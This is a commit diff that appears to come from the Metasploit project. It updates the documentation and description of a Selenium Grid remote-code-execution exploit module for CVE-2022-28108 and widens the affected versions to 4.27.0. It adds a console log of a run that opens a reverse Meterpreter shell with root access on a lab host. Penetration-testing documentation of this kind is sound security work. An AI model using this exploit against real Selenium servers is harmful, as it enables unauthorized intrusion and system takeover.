Update vulnerable version

Takahiro-Yoko · Takahiro-Yoko · commit 3b947cf1c528 · 2025-01-02T09:57:00.000+09:00
diff --git a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
@@ -1,18 +1,20 @@
 ## Vulnerable Application
 
-Selenium Server (Grid) before 4.7 allows CSRF because it permits non-JSON content types
+Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
+allows CSRF because it permits non-JSON content types
 such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
-The number of sessions must be fewer than maxSessions for the exploit to succeed.
+At least, the number of sessions must be fewer than maxSessions for the exploit to succeed.
 
 The vulnerability affects:
 
-    * Selenium Server (Grid) before 4.7
+    * Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
 
 This module was successfully tested on:
 
     * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
     * selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
     * selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
 
 
 ### Installation
@@ -136,3 +138,22 @@ BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
 meterpreter > 
 ```
+
+### selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
+```
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4449
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:60066) at 2025-01-02 09:29:36 +0900
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 24.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
diff --git a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -15,7 +15,8 @@ def initialize(info = {})
         info,
         'Name' => 'Selenium geckodriver RCE',
         'Description' => %q{
-          Selenium Server (Grid) before 4.7 allows CSRF because it permits non-JSON content types
+          Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
+          allows CSRF because it permits non-JSON content types
           such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
         },
         'Author' => [
